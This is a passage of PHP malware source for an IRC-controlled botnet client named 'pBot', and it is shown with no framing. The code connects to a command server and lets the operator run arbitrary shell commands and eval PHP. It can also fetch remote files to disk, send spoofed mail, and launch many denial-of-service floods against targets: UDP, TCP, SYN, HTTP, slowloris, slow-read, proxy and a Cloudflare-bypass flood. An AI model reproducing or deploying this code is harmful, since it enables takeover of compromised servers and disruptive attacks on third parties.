} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[UKN]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[UKN]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2CloudFlareFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2Bitch Got Nulled!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2HttpFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2HttpFlood Finished!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Started!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Finished (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TCP Started!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2TCP Finished!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2Started Slowread!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2Finished Slowread\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2SlowLoris Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2SlowLoris Finished!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2synFlood Started!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2SynFlood Finished!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "[\2UdpFlood Started!\2]");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "[\2UdpFlood Finished!\2]: " . $env . " MB sent / Average: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TcpConn Started!\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2TcpFlood Finished!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>